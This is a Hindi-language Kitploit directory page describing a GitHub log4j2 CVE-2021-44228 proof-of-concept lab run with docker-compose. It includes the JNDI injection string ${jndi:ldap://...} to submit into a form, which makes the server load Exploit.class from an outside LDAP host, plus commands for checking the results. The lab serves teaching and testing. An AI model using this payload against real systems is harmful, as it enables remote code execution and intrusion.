Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-rce-CVE-2021-44228 — log4j2 CVE-2021-44228 POC | Kitploit
उपकरण/GitHubGitHub/1hakusai1/log4j-rce-cve-2021-44228
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHub1hakusai1/log4j-rce-cve-2021-44228

log4j-rce-CVE-2021-44228

log4j2 CVE-2021-44228 POC

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

अवलोकन

यह प्रोजेक्ट log4j2 की रिमोट कोड एक्सीक्यूशन भेद्यता (CVE-2021-44228) को वास्तव में परीक्षण करने के लिए है।

कंटेनर चलाएँ

root@kitploit:~
docker-compose up

log4j कंटेनर को शुरू होने और उपयोग के लिए तैयार होने में थोड़ा समय लगता है। कृपया निम्न कमांड से प्रगति की जाँच करें।

root@kitploit:~
docker logs -f log4j

जब Server started: Listening on port 8081 दिखाई दे, तो तैयार है।

हमले से पहले की स्थिति की जाँच

log4j कंटेनर के /root निर्देशिका की जाँच करें।

root@kitploit:~
docker exec log4j ls /root

प्रारंभिक अवस्था में, केवल work निर्देशिका है।

वास्तव में हमला करें

http://localhost:8081/ पर जाएँ। यह एक सरल एप्लिकेशन है जो फॉर्म में दर्ज नाम को स्क्रीन और लॉग में आउटपुट करता है।

फॉर्म में ${jndi:ldap://ldap.example.com/cn=java,dc=example,dc=com} दर्ज करें और सबमिट करें।

log4j कंटेनर के /root निर्देशिका की जाँच करें।

root@kitploit:~
docker exec log4j ls /root

हमलावर द्वारा तैयार कोड निष्पादित होगा, और वे फ़ाइलें बन जाएंगी जो पहले मौजूद नहीं थीं। चूंकि फ़ाइल नामों में टाइमस्टैम्प है, इसलिए हमले की संख्या के अनुसार नई फ़ाइलें बढ़ती रहेंगी।

ldap कंटेनर के लॉग की जाँच करने पर, log4j कंटेनर से SEARCH अनुरोध आ रहा है।

root@kitploit:~
docker logs ldap

web कंटेनर के tomcat लॉग की जाँच करने पर, log4j कंटेनर से Exploit.class (हमले में उपयोग किया जाने वाला क्लास) तक पहुँच आ रही है।

root@kitploit:~
docker exec -it web bash
cat /usr/local/tomcat/logs/localhost_access_log.*
टूल डाउनलोड करें